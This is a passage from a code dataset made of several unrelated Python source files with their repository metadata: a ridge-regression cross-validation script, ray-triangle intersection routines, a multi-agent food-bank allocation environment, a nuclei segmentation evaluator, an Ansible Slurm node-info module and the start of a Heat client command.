a1.normalize_data(x)\n\n\nN_TRAIN = 100\nx_train = x[0:N_TRAIN,:]\nx_test = x[N_TRAIN:,:]\nt_train = targets[0:N_TRAIN]\nt_test = targets[N_TRAIN:]\n\n# declare the lambda values to sweep\nlamda =[0,0.01,0.1,1,10,100,1000,10000]\n\n\n# Complete the linear_regression and evaluate_regression functions of the assignment1.py\n# Pass the required parameters to these functions\n\ntrain_err = {}\ntest_err = {}\nfor j in lamda:\n\n\ttrain_err_temp = 0\n\ttest_err_temp = 0\n\t\n\tfor i in range(0, 10):\n\t\t# start = (i-1)*10\n\t\t# end = i*10\n\t\t#print(start, end)\n\t\tend = np.arange(i * 10,(i * 10) + 10) # row indices of the i-th validation fold\n\t\tvalid_x = x_train[end,:]\n\t\tvalid_t = t_train[end]\n\t\tTrainDataindex = np.delete(np.arange(100),end)\n\t\treg_train_x = x_train[TrainDataindex,: ]\n\t\treg_train_t = t_train[TrainDataindex]\n\n\t\t# valid_x = x[start:end, :]\n\t\t# valid_t = targets[start:end]\n\t\t# reg_train_x = np.concatenate((x[:start, :], x[end:, :]), axis = 0)\n\t\t# reg_train_t = np.concatenate((targets[:start], targets[end:]), axis = 0)\n\n\n\t\t(w, tr_err) = a1.linear_regression(reg_train_x, reg_train_t, \"polynomial\", degree = 2, reg_lambda = j)\n\t\t(t_est, te_err) = a1.evaluate_regression(w, valid_x, valid_t, 
\"polynomial\", degree = 2)\n\t\t# print(w)\n\n\n\t\ttrain_err_temp += tr_err / 10\n\t\ttest_err_temp += te_err / 10\n\n\t# train_err_temp = train_err_temp / 10\n\t# test_err_temp = test_err_temp / 10\n\n\n\ttrain_err[j] = train_err_temp\n\ttest_err[j] = test_err_temp\nprint(list(test_err.values()))\n\n#result = list(test_err[0]).append(test_err)\n# Produce a plot of results.\nplt.rcParams.update({'font.size': 15})\n# plt.plot(list(train_err.keys()), list(train_err.values()))\n# plt.plot(list(test_err.keys()), list(test_err.values()))\n# plt.semilogx(list(train_err.keys()), list(train_err.values()))\nplt.semilogx(list(test_err.keys()), list(test_err.values()))\nplt.ylabel('Avg RMS')\nplt.legend(['CV error','Testing error'])\nplt.title('Fit with polynomials, no regularization')\nplt.xlabel('Polynomial degree')\nplt.show()\n","repo_name":"KeyG518/Linear-Regression","sub_path":"polynomial_regression_reg.py","file_name":"polynomial_regression_reg.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8184377431","text":"from typing import Optional, Tuple\n\nimport numpy as np\n\n\ndef compute_triangle_plane_normal(v0: np.ndarray, v1: np.ndarray, v2: np.ndarray) -> np.ndarray:\n \"\"\"Compute normal to plane spanned by triangle's 3 vertices.\n v2\n / \\\n / \\\n v0 --- v1\n\n Args:\n v0: (3,) array representing triangle vertex 0, ordered counter-clockwise (CCW).\n v1: (3,) array representing triangle vertex 1.\n v2: (3,) array representing triangle vertex 2.\n\n Returns:\n Unit length plane normal vector of shape (3,).\n \"\"\"\n assert all([v.dtype in [np.float32, np.float64] for v in [v0, v1, v2]])\n # compute plane's normal\n v0v1 = v1 - v0\n v0v2 = v2 - v0\n N = np.cross(v0v1, v0v2)\n N /= np.linalg.norm(N)\n return N\n\n\ndef inside_outside_test(N: np.ndarray, v0: np.ndarray, v1: np.ndarray, v2: np.ndarray, P: np.ndarray) -> bool:\n \"\"\"Determine whether a point on a 3d plane falls within a triangle's boundary.\n\n v2\n / \\\n / \\\n v0 --- v1\n\n C is a vector perpendicular to triangle's plane \n\n Args:\n N: (3,) array representing plane normal.\n v0: (3,) array representing triangle vertex 0, ordered counter-clockwise (CCW).\n v1: (3,) array representing triangle vertex 1.\n v2: (3,) array representing triangle vertex 2.\n P: (3,) array representing a point lying on the triangle's plane.\n\n Returns:\n Boolean indicating whether plane point falls within triangle.\n \"\"\"\n # edge 0\n edge0 = v1 - v0\n vp0 = P - v0\n C = np.cross(edge0, vp0)\n if N.dot(C) < 0:\n return False # P is on the right side\n\n # edge 1\n edge1 = v2 - v1\n vp1 = P - v1\n C = np.cross(edge1, vp1)\n if N.dot(C) < 0:\n return False # P is on the right side\n\n # edge 2\n edge2 = v0 - v2\n vp2 = P - v2\n C = np.cross(edge2, vp2)\n if N.dot(C) < 0:\n return False # P is on the right side\n\n return True\n\n\ndef inside_outside_test_vectorized(\n N: np.ndarray, v0: np.ndarray, v1: np.ndarray, v2: np.ndarray, Ps: np.ndarray\n) -> np.array:\n \"\"\"Determine whether multiple points on a 3d plane fall within a triangle's boundary.\n\n Args:\n N: (3,) array representing plane normal.\n v0: (3,) array representing triangle vertex 0, ordered counter-clockwise (CCW).\n v1: (3,) array representing triangle vertex 1.\n v2: (3,) array representing triangle vertex 2.\n Ps: (N,3) array representing points lying on the triangle's plane.\n Not necessarily within the triangle. 
These came from ray-plane intersection.\n\n Returns:\n Boolean array of shape (N,) indicating which plane points falls within the triangle.\n \"\"\"\n # edge 0\n edge0 = v1 - v0\n # edge 1\n edge1 = v2 - v1\n # edge 2\n edge2 = v0 - v2\n\n vp0 = Ps - v0\n vp1 = Ps - v1\n vp2 = Ps - v2\n\n C0 = np.cross(edge0, vp0)\n C1 = np.cross(edge1, vp1)\n C2 = np.cross(edge2, vp2)\n\n # if (dot product < 0), then P is on the right side\n return np.logical_and.reduce([C0.dot(N) >= 0, C1.dot(N) >= 0, C2.dot(N) >= 0])\n\n\ndef ray_triangle_intersect(\n origin: np.ndarray, ray_dir: np.ndarray, v0: np.ndarray, v1: np.ndarray, v2: np.ndarray\n) -> Tuple[bool, Optional[np.ndarray]]:\n \"\"\"Compute ray-triangle intersection, if such a intersection is possible.\n\n Args:\n origin: Array of shape (3,) representing ray origin.\n ray_dir: ray direction shape (3,)\n v0: (3,) array representing triangle vertex 0, ordered counter-clockwise (CCW).\n v1: (3,) array representing triangle vertex 1.\n v2: (3,) array representing triangle vertex 2.\n\n Returns:\n Boolean indicating whether valid intersection occurred.\n P: array of shape (3,) representing intersection point if exists, otherwise None.\n \"\"\"\n N = compute_triangle_plane_normal(v0, v1, v2)\n\n # Step 1: finding P\n # check if ray and plane are parallel ?\n NdotRayDirection = N.dot(ray_dir)\n kEpsilon = 1e-10\n if np.absolute(NdotRayDirection) < kEpsilon: # almost 0\n return False, None # they are parallel so they don't intersect !\n\n # compute d parameter of implicit line equation\n d = N.dot(v0)\n\n # compute t. t is the distance along the ray from the origin\n t = (d - N.dot(origin)) / NdotRayDirection\n # check if the triangle is in behind the ray\n if t < 0:\n return False, None # the triangle is behind\n\n # compute the intersection point using ray parameterization\n P = origin + t * ray_dir\n\n is_inside = inside_outside_test(N, v0, v1, v2, P)\n if not is_inside:\n return False, None\n\n return True, P # this ray hits the triangle\n\n\ndef ray_triangle_intersect_moller_trombore(\n origin: np.ndarray, ray_dir: np.ndarray, v0: np.ndarray, v1: np.ndarray, v2: np.ndarray\n) -> Tuple[bool, Optional[np.ndarray]]:\n \"\"\"Compute ray-triangle intersection using the Moller-Trombore algorithm, if such a intersection is possible.\n\n t is the distance along the ray from the origin\n\n Args:\n origin: shape (3,)\n ray_dir: ray direction shape (3,)\n v0: triangle vertex 0, ordered counter-clockwise (CCW)\n v1: triangle vertex 1\n v2: triangle vertex 2\n\n Returns:\n boolean indicating whether intersection is valid\n P: intersection point if exists, otherwise None\n \"\"\"\n v0v1 = v1 - v0\n v0v2 = v2 - v0\n pvec = np.cross(ray_dir, v0v2)\n det = v0v1.dot(pvec)\n\n # CULLING\n # if the determinant is negative the triangle is backfacing\n # if the determinant is close to 0, the ray misses the triangle\n kEpsilon = 1e-10\n if det < kEpsilon:\n return False, None\n\n invDet = 1 / det\n\n tvec = origin - v0\n u = tvec.dot(pvec) * invDet\n if (u < 0) or (u > 1):\n return False, None\n\n qvec = np.cross(tvec, v0v1)\n v = ray_dir.dot(qvec) * invDet\n if (v < 0) or (u + v > 1):\n return False, None\n\n t = v0v2.dot(qvec) * invDet\n\n P = origin + t * ray_dir\n return True, P\n\n\ndef ray_triangle_intersect_vectorized_moller_trombore(\n origin: np.ndarray, ray_dirs: np.ndarray, v0: np.ndarray, v1: np.ndarray, v2: np.ndarray\n) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Use Cramer's rule and Barycentric coordinates, per\n 
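# A tiny hedged usage check for ray_triangle_intersect above (values chosen so
# the hit point is easy to verify by hand): a ray from the origin along +z
# toward a CCW triangle lying in the z = 1 plane.
import numpy as np

v0 = np.array([-1.0, -1.0, 1.0])
v1 = np.array([1.0, -1.0, 1.0])
v2 = np.array([0.0, 1.0, 1.0])
hit, P = ray_triangle_intersect(np.zeros(3), np.array([0.0, 0.0, 1.0]), v0, v1, v2)
# hit is True and P is [0, 0, 1]: the plane is hit at distance t = 1 and the
# point passes the inside-outside test.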
https://www.scratchapixel.com/lessons/3d-basic-rendering/ray-tracing-rendering-a-triangle/barycentric-coordinates\n\n    Args:\n        ray_dirs: N x 3 for directions of N rays\n\n    Returns:\n        valid: array of bool, whether hit or not\n        Ps: array of intersection points, otherwise NULL values\n    \"\"\"\n    v0v1 = v1 - v0\n    v0v2 = v2 - v0\n    pvec = np.cross(ray_dirs, v0v2)\n    det = pvec.dot(v0v1)\n\n    # CULLING\n    # if the determinant is negative the triangle is backfacing\n    # if the determinant is close to 0, the ray misses the triangle\n    kEpsilon = 1e-10\n    # valid = det >= kEpsilon\n\n    invDet = 1 / det\n\n    tvec = origin - v0\n    u = pvec.dot(tvec) * invDet\n\n    # valid = np.logical_and.reduce(\n    # \t[\n    # \t\tu >= 0,\n    # \t\tu <= 1,\n    # \t\tvalid\n    # \t])\n\n    qvec = np.cross(tvec, v0v1)\n    v = ray_dirs.dot(qvec) * invDet\n    valid = np.logical_and.reduce(\n        [\n            det >= kEpsilon,\n            u >= 0,\n            u <= 1,\n            v >= 0,\n            u + v <= 1\n            # valid\n        ]\n    )\n    t = v0v2.dot(qvec) * invDet\n\n    # compute the intersection point using ray parameterization\n    # see broadcast example below (so last dims match for multiply)\n    Ps = origin + (t * ray_dirs.T).T\n    return valid, Ps\n\n\ndef ray_triangle_intersect_vectorized(\n    origin: np.ndarray, ray_dirs: np.ndarray, v0: np.ndarray, v1: np.ndarray, v2: np.ndarray\n) -> Tuple[np.ndarray, np.ndarray]:\n    \"\"\"\n\n    Args:\n        ray_dirs: N x 3 for directions of N rays\n\n    Returns:\n        valid: array of bool, whether hit or not\n        Ps: array of intersection points, otherwise NULL values\n    \"\"\"\n    N = compute_triangle_plane_normal(v0, v1, v2)\n\n    # Step 1: finding P\n    # check if ray and plane are parallel ?\n    NdotRayDirections = ray_dirs.dot(N)\n    kEpsilon = 1e-10\n\n    # if almost 0, they are parallel so they don't intersect !\n    valid = np.absolute(NdotRayDirections) > kEpsilon\n\n    # compute d parameter of implicit line equation\n    d = N.dot(v0)\n\n    DENOMINATOR_PADDING = 100\n    NdotRayDirections[~valid] += DENOMINATOR_PADDING\n\n    # compute t -- a vector of distances along the ray\n    t = (d - N.dot(origin)) / NdotRayDirections\n\n    # compute the intersection point using ray parameterization\n    # see broadcast example below (so last dims match for multiply)\n    Ps = origin + (t * ray_dirs.T).T\n\n    is_inside = inside_outside_test_vectorized(N, v0, v1, v2, Ps)\n\n    # check if the triangle is behind the ray:\n    # if t < 0, the triangle is behind\n    valid = np.logical_and.reduce([valid, t >= 0, is_inside])\n\n    # if True, this ray hits the triangle\n    return valid, Ps\n","repo_name":"johnwlambert/tbv","sub_path":"tbv/rendering/ray_triangle_intersection.py","file_name":"ray_triangle_intersection.py","file_ext":"py","file_size_in_byte":8935,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"} +{"seq_id":"1949385204","text":"import numpy as np\nimport enum\nimport copy\nimport logging\n\nfrom envs_pymarl.foodbank.food_situations import get_food_params\n\n# AGENTS_COUNT = 2\n# FOODS = [20, 20, 20]\n# NUM_FOODS = len(FOODS)\n# REQUESTS = [\n#     [10, 10, 10],\n#     [5, 10, 5],\n#     [5, 5, 10],\n# ]\n\n\nclass EpisodeStatus(enum.IntEnum):\n    ONGOING = 0\n    COMPLETED = 1\n    TIMEOUT = 2\n\n\nclass FoodAllocationEnv:\n    \"\"\"\n    The food allocation environment for decentralised multi-agent\n    micromanagement scenarios in Food Bank.\n\n    A multi-agent food allocation simulation environment for a food bank.\n    \"\"\"\n\n    def __init__(\n        self,\n        full_observable,\n        episode_limit,\n        debug,\n        situation_name,\n        reward_mean_weight,\n        reward_std_weight,\n        reward_complete_bonus,\n        reward_step_cost,\n        seed,\n    ):\n        food_params = 
get_food_params(situation_name)\n\n self.n_agents = food_params[\"n_agents\"]\n\n self.n_foods = food_params[\"n_foods\"]\n self.requests = np.array(food_params[\"requests\"])\n self.initial_stock = np.array(food_params[\"initial_stock\"])\n\n self.reward_step_cost = reward_step_cost\n self.reward_mean_weight = reward_mean_weight\n self.reward_std_weight = reward_std_weight\n self.reward_complete_bonus = reward_complete_bonus\n\n self.episode_limit = episode_limit\n\n self.n_actions = self.n_foods + 1\n\n self._step_count = None\n # self._episode_count = 0\n\n self.full_observable = full_observable\n self.debug = debug\n\n self.timeouts = 0\n\n def reset(self, episode, test_mode=False, print_log=False):\n \"\"\"\n 環境を初期化\n エージェントの観測とグローバル状態を返す\n \"\"\"\n # タイムステップをリセット\n self._step_count = 0\n # バンクの在庫をリセット\n self.bank_stock = copy.deepcopy(self.initial_stock)\n # エージェントの在庫をリセット\n self.agents_stock = np.zeros((self.n_agents, self.n_foods))\n\n self.episode = episode\n\n # 終了フラグをリセット\n self.agents_done = [False for _ in range(self.n_agents)]\n\n # テストの際にログを残す\n self.debug = test_mode\n self.print_log = print_log\n\n # 最小残り個数を計算する\n # 食品ご��の要求の合計\n # requests_sum = np.sum(np.array(self.requests), axis=0)\n # 在庫 - 要求 (0以上の部分だけ足し合わせる)\n # leftover = self.initial_stock - requests_sum\n # self.ideal_min_leftover = np.sum((leftover > 0) * leftover)\n\n if self.print_log:\n logging.debug(\"\\n\\n\")\n logging.debug(\"Started Episode {}\".format(self.episode).center(60, \"*\"))\n logging.debug(\"Bank Stock\".center(60, \"-\"))\n logging.debug(self.bank_stock)\n logging.debug(\"Agent Stock\".center(60, \"-\"))\n for agent_i in range(self.n_agents):\n logging.debug(\"Agent{}: {}\".format(agent_i, self.agents_stock[agent_i]))\n logging.debug(\"Agent Request\".center(60, \"-\"))\n for agent_i in range(self.n_agents):\n logging.debug(\"Agent{}: {}\".format(agent_i, self.requests[agent_i]))\n\n return self.get_obs(debug=False), self.get_state()\n\n def step(self, agents_action):\n \"\"\"\n 行動を環境に出力してタイムステップを1つ進める\n\n -> [ 報酬, 終了フラグ, 追加情報(残り個数など) ]\n \"\"\"\n\n # 人数分の行動が入力されているかチェック\n assert len(agents_action) == self.n_agents\n # タイムステップを進める\n self._step_count += 1\n\n # エージェントごと\n for agent_i, action in enumerate(agents_action):\n # 行動を出力\n self.take_action(agent_i, action)\n\n status = self.check_status()\n\n reward = self.reward_step_cost\n terminated = False\n info = {\n \"completed\": False,\n \"timeout\": False,\n }\n\n # エピソード終了時に報酬を与える\n if status in (EpisodeStatus.COMPLETED, EpisodeStatus.TIMEOUT):\n agents_satisfaction = self.get_satisfaction()\n reward += self.get_reward(agents_satisfaction)\n\n for agent_i in range(self.n_agents):\n info.update(\n {\n \"agent{}_satisfaction\".format(agent_i): agents_satisfaction[\n agent_i\n ]\n }\n )\n info.update(\n {\n \"satisfaction_mean\": np.mean(agents_satisfaction),\n \"satisfaction_std\": np.std(agents_satisfaction),\n }\n )\n\n if self.print_log:\n logging.debug(\"TIMESTEP {}\".format(self._step_count).center(60, \"-\"))\n logging.debug(\"Actions\".center(60, \"-\"))\n logging.debug(\"Bank Stock\".center(60, \"-\"))\n logging.debug(self.bank_stock)\n logging.debug(\"Agent Stock\".center(60, \"-\"))\n for agent_i in range(self.n_agents):\n logging.debug(\"Agent{}: {}\".format(agent_i, self.agents_stock[agent_i]))\n\n if status is EpisodeStatus.COMPLETED:\n terminated = True\n reward += self.reward_complete_bonus\n info[\"completed\"] = True\n if self.print_log:\n logging.debug(\"Complete Bonus: {}\".format(self.reward_complete_bonus))\n 
logging.debug(\"Episode Completed.\")\n\n elif status is EpisodeStatus.TIMEOUT:\n terminated = True\n info[\"timeout\"] = True\n self.timeouts += 1\n if self.print_log:\n logging.debug(\"Episode Timeouts.\")\n\n if terminated:\n # self._episode_count += 1\n info[\"leftover\"] = sum(self.bank_stock)\n\n if self.print_log:\n logging.debug(\"Reward = {}\".format(reward).center(60, \"-\"))\n\n return reward, terminated, info\n\n def take_action(self, agent_i, action):\n \"\"\"\n エージェントが行動をとる(選んだ食品を獲得)\n \"\"\"\n if action == self.get_total_actions() - 1:\n # No-op(何もしない)\n if self.print_log:\n logging.debug(\"Agent {}: No-op\".format(agent_i))\n return\n\n food = action\n\n if self.bank_stock[food] > 0:\n # フードバンクから1つ取る\n self.bank_stock[food] -= 1\n # 自身の在庫が1つ増える\n self.agents_stock[agent_i][food] += 1\n if self.print_log:\n logging.debug(\"Agent {}: Get a Food{}\".format(agent_i, food))\n else:\n # 在庫がない(他のエージェントにもうとられた)\n # TODO: 選択した行動と一致していないので検討が必要\n if self.print_log:\n logging.debug(\"Agent {}: Couldn't Get a Food{}\".format(agent_i, food))\n\n def get_satisfaction(self):\n # 残り個数が 最小残り個数+5個以下 だった場合に報酬\n # reward_no_food_waste = 0\n # if sum(self.bank_stock) <= self.ideal_min_leftover + 5:\n # reward_no_food_waste = 10\n\n # 満足度による報酬\n # 各食品の満足度 = 獲得した個数 / 要求個数\n rates = self.agents_stock / self.requests\n # 最大値を1に\n rates[rates > 1.0] = 1.0\n # 各エージェントの満足度 = 各食品の満足度の和\n agents_satisfaction = np.mean(rates, axis=1)\n\n return agents_satisfaction\n\n def get_reward(self, agents_satisfaction):\n \"\"\"\n 報酬関数\n \"\"\"\n\n # 平均\n reward_mean_satis = np.mean(agents_satisfaction)\n # 標準偏差\n reward_std_satis = np.std(agents_satisfaction)\n\n # 重み\n reward = (\n self.reward_mean_weight * reward_mean_satis\n - self.reward_std_weight * reward_std_satis\n )\n\n if self.print_log:\n # logging.debug(\"Agents Stock: {}\".format(self.agents_stock))\n logging.debug(\"Agents Satisfaction: {}\".format(agents_satisfaction))\n logging.debug(\"Leftover Count: {}\".format(sum(self.bank_stock)))\n\n logging.debug(\"Mean Satis.: {}\".format(reward_mean_satis))\n logging.debug(\"Std Satis.: {}\".format(reward_std_satis))\n logging.debug(\"REWARD (Satisfaction): {}\".format(reward))\n\n return reward\n\n def check_status(self):\n \"\"\"\n 食品分配が終わったかどうかの状況チェック\n \"\"\"\n # 最大ステップ数を超えた\n if self._step_count >= self.episode_limit:\n return EpisodeStatus.TIMEOUT\n\n # 獲得個数と要求個数の差\n gap = self.requests - self.agents_stock\n\n # 全てのエージェントの要求が満たされた\n if np.all(gap <= 0):\n return EpisodeStatus.COMPLETED\n\n # 要求のある食品の在庫がもうどれもない(全エージェントの取れる行動がない)\n required_count = np.sum(gap, axis=0)\n required_food_stock = self.bank_stock[required_count > 0]\n if np.all(required_food_stock == 0):\n return EpisodeStatus.COMPLETED\n\n # 継続\n return EpisodeStatus.ONGOING\n\n def get_env_info(self):\n \"\"\"\n 環境のパラメータ\n \"\"\"\n env_info = {\n \"state_shape\": self.get_state_size(),\n \"obs_shape\": self.get_obs_size(),\n \"n_actions\": self.get_total_actions(),\n \"n_agents\": self.n_agents,\n \"episode_limit\": self.episode_limit,\n }\n return env_info\n\n def get_obs_size(self):\n \"\"\"\n 部分観測のサイズを返す\n - 自身の各食品の満足度 (0.0~1.0)\n - 各食品の残量 (0.0~1.0)\n \"\"\"\n return 2 * self.n_foods\n\n def get_state_size(self):\n \"\"\"\n グローバル状態のサイズを返す\n \"\"\"\n return self.get_obs_size() * self.n_agents\n\n def get_total_actions(self):\n \"\"\"\n エージェントがとることのできる行動の数を返す\n \"\"\"\n return self.n_actions\n\n def get_avail_actions(self):\n \"\"\"\n 全エージェントの選択可能な行動をリストで返す\n \"\"\"\n avail_actions = []\n for agent_i in range(self.n_agents):\n 
avail_agent = np.zeros(self.n_foods)\n # 要求個数以上取れないようにする\n avail_food = (self.bank_stock > 0) & (\n self.agents_stock[agent_i] < self.requests[agent_i]\n )\n # avail_food = self.bank_stock > 0\n avail_agent[avail_food] = 1\n avail_actions.append(np.append(avail_agent, 1))\n\n if self.print_log:\n logging.debug(\"Agent{} Avail Food: {}\".format(agent_i, avail_agent))\n\n # print(avail_actions)\n return avail_actions\n\n def get_obs(self, debug=True):\n \"\"\"\n 全てのエージェントの観測を1つのリストで返す\n - 各食品の残量 (0.0~1.0)\n - 自身の各食品の満足度 (0.0~1.0)\n NOTE: 分散実行時はエージェントは自分自身の観測のみ用いるようにする\n \"\"\"\n _obs = []\n\n # 在庫残りの割合\n remaining = [0 for _ in range(self.n_foods)]\n for food in range(self.n_foods):\n # 残量率\n remaining[food] = self.bank_stock[food] / self.initial_stock[food]\n\n # 要求が満たされた割合\n for agent_i in range(self.n_agents):\n satisfaction = [0 for _ in range(self.n_foods)]\n for food in range(self.n_foods):\n # 満足度\n satisfaction[food] = (\n self.agents_stock[agent_i][food] / self.requests[agent_i][food]\n )\n\n agent_obs = np.concatenate([remaining, satisfaction])\n _obs.append(agent_obs)\n\n if self.print_log and debug:\n logging.debug(\"Obs Agent{}\".format(agent_i).center(60, \"-\"))\n # logging.debug(\n # \"Avail. actions {}\".format(\n # self.get_avail_agent_actions(agent_id)\n # )\n # )\n # logging.debug(\"Move feats {}\".format(move_feats))\n # logging.debug(\"Enemy feats {}\".format(enemy_feats))\n # logging.debug(\"Ally feats {}\".format(ally_feats))\n # logging.debug(\"Own feats {}\".format(own_feats))\n logging.debug(agent_obs)\n\n if self.full_observable:\n _obs = np.array(_obs).flatten().tolist()\n _obs = [_obs for _ in range(self.n_agents)]\n return _obs\n\n def get_state(self):\n \"\"\"\n グローバル状態を返す\n NOTE: この関数は分散実行時は用いないこと\n \"\"\"\n # 各エージェントの観測を結合したものをグローバル状態とする\n obs_concat = np.concatenate(self.get_obs(debug=False), axis=0).astype(\n np.float32\n )\n return obs_concat\n\n # if self.obs_instead_of_state:\n # obs_concat = np.concatenate(self.get_obs(), axis=0).astype(\n # np.float32\n # )\n # return obs_concat\n\n # state_dict = self.get_state_dict()\n\n # state = np.append(\n # state_dict[\"allies\"].flatten(), state_dict[\"enemies\"].flatten()\n # )\n # if \"last_action\" in state_dict:\n # state = np.append(state, state_dict[\"last_action\"].flatten())\n # if \"timestep\" in state_dict:\n # state = np.append(state, state_dict[\"timestep\"])\n\n # state = state.astype(dtype=np.float32)\n\n # if self.debug:\n # logging.debug(\"STATE\".center(60, \"-\"))\n # logging.debug(\"Ally state {}\".format(state_dict[\"allies\"]))\n # logging.debug(\"Enemy state {}\".format(state_dict[\"enemies\"]))\n # if self.state_last_action:\n # logging.debug(\"Last actions {}\".format(self.last_action))\n\n # return state\n\n def close(self):\n return\n","repo_name":"lighthouse117/marl-robots-2d","sub_path":"src/envs_pymarl/foodbank/food_allocation.py","file_name":"food_allocation.py","file_ext":"py","file_size_in_byte":14508,"program_lang":"python","lang":"ja","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"33626133874","text":"import os\nimport copy\nimport numpy as np\nfrom tqdm import tqdm\nimport gc\nimport tensorflow as tf\ntfconfig = tf.ConfigProto()\ntfconfig.gpu_options.allow_growth = True\nsession = tf.Session(config=tfconfig)\nimport keras\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard\nimport models\nimport reader\nimport config as conf\nfrom sklearn.model_selection import train_test_split\nfrom utils import rle_encoding, get_label, lb, 
label_to_rles\nimport cv2\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom mean_average import average_scores\n\nprint('Loading trained weights...')\n\nunet_model = models.get_U_Net_model(gpus=1, load_weights=conf.U_NET_CKPT)[0]\nunet_model.summary()\n\nprint('Generating metadata...')\nimgs_meta = reader.dataset_filepath(conf.VALID_PATH, get_masks=True)\nimgs_batch, imgs_path, imgs_shape = reader.dir_reader(imgs_meta, height=conf.U_NET_DIM, width=conf.U_NET_DIM)\n\npreds = np.squeeze(unet_model.predict(imgs_batch, batch_size=conf.U_NET_BATCH_SIZE, verbose=1))\n\nprint('Resizing...')\npreds_test_upsampled = []\nfor n in tqdm(range(len(imgs_batch)), total=len(imgs_batch), ascii=True):\n nuclei = cv2.resize(preds[n,...,0], imgs_shape[n])\n marker = cv2.resize(preds[n,...,1], imgs_shape[n])\n dt = cv2.resize(preds[n,...,2], imgs_shape[n])\n preds_test_upsampled.append((nuclei, marker, dt))\n\ndel imgs_batch, preds, dt\ngc.collect() # release memory\n\nprint('Post-processing...')\n\nlabels = []\nfor n, path in tqdm(enumerate(imgs_path), total=len(imgs_path), ascii=True):\n label = get_label(*preds_test_upsampled[n])\n labels.append(label)\n\nmasks = []\nfor meta in tqdm(imgs_meta, total=len(imgs_meta), ascii=True):\n mask_paths = meta['masks']\n mask_4_1_image = []\n for mask_path in mask_paths:\n mask_bool = (cv2.imread(mask_path, cv2.IMREAD_GRAYSCALE)>0).astype(np.bool)\n mask_4_1_image.append(mask_bool)\n masks.append(mask_4_1_image)\n\nprint('Evaluating...')\nthresholds = np.arange(0.5, 1.0, 0.05)\naps, ars = average_scores(masks, labels, thresholds)\nfor ap, ar, t in zip(aps, ars, thresholds):\n print('AP@%.2f = %.4f'%(t, ap))\n print('AR@%.2f = %.4f'%(t, ar))\n print('-'*5)\nprint('mAP@[.5:.95] = %.4f'%np.mean(aps))\nprint('mAR@[.5:.95] = %.4f'%np.mean(ars))\n","repo_name":"peter0749/nuclei_instance_segmentation","sub_path":"lib/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35115239755","text":"#!/usr/bin/python\n\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nANSIBLE_METADATA = {\n 'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'\n}\n\nDOCUMENTATION = \"\"\"\nmodule: slurm_node_info\nauthor:\n - Alexander Maslennikov (@amaslenn)\nshort_description: List Slurm nodes\ndescription:\n - Retrieve information about nodes on Slurm Workload Manager.\n - For more information, refer to the Slurm documentation at\n U(https://slurm.schedmd.com/scontrol.html).\nversion_added: 1.0.0\nseealso:\n - module: sodalite.hpc.slurm_partition_info\noptions:\n node:\n type: str\n description:\n - Name of the node to retrieve.\n\"\"\"\n\nEXAMPLES = \"\"\"\n- name: List all nodes\n sodalite.hpc.slurm_node_info:\n register: result\n- name: List the selected node\n sodalite.hpc.slurm_node_info:\n node: wn1\n register: result\n- name: Show node\n ansible.builtin.debug:\n msg: \"{{ result.nodes[0] }}\"\n\"\"\"\n\nRETURN = \"\"\"\nnodes:\n description: List of Slurm nodes.\n returned: success\n type: list\n elements: dict\n\"\"\"\n\n\nfrom ansible.module_utils._text import to_text\nfrom ..module_utils import slurm_utils\nfrom ..module_utils.hpc_module import HpcModule\n\n\nclass SlurmNodeInfoModule(HpcModule):\n def __init__(self):\n argument_spec = dict(\n 
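# 'node' is optional; when omitted, run_module below falls back to 'scontrol show nodes' and lists every node\n 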
node=dict(type='str', required=False)\n )\n super(SlurmNodeInfoModule, self).__init__(argument_spec)\n\n def run_module(self):\n node_name = self.ansible.params['node']\n command = 'scontrol show node {0}'.format(node_name) if node_name is not None else 'scontrol show nodes'\n stdout = self.execute_command(command)\n\n result = {}\n try:\n result[\"nodes\"] = slurm_utils.parse_output(stdout, \"NodeName\")\n except Exception as err:\n self.ansible.fail_json(\n msg='Failed to parse scontrol output',\n details=to_text(err),\n )\n\n self.ansible.exit_json(changed=False, **result)\n\n\ndef main():\n module = SlurmNodeInfoModule()\n module.run_module()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SODALITE-EU/platform-discovery-service","sub_path":"src/ansible_collections/sodalite/hpc/plugins/modules/slurm_node_info.py","file_name":"slurm_node_info.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4395552739","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\n\"\"\"Orchestration v1 resource type implementations\"\"\"\n\nimport logging\n\nfrom osc_lib.command import command\nfrom osc_lib import exceptions as exc\nfrom osc_lib.i18n import _\n\nfrom heatclient.common import format_utils\nfrom heatclient.common import utils as heat_utils\nfrom heatclient import exc as heat_exc\n\n\nclass ResourceTypeShow(format_utils.YamlFormat):\n \"\"\"Show details and optionally generate a template for a resource type.\"\"\"\n\n log = logging.getLogger(__name__ + \".ResourceTypeShow\")\n\n def get_parser(self, prog_name):\n parser = super(ResourceTypeShow,\n self).get_parser(prog_name)\n parser.add_argument(\n 'resource_type',\n metavar='<resource-type>',\n help=_('Resource type to show details for'),\n )\n parser.add_argument(\n '--template-type',\n metavar='<template-type>',\n help=_('Optional template type to generate, hot or cfn')\n )\n parser.add_argument(\n '--long',\n default=False,\n action='store_true',\n help=_('Show resource type with corresponding description.')\n )\n return 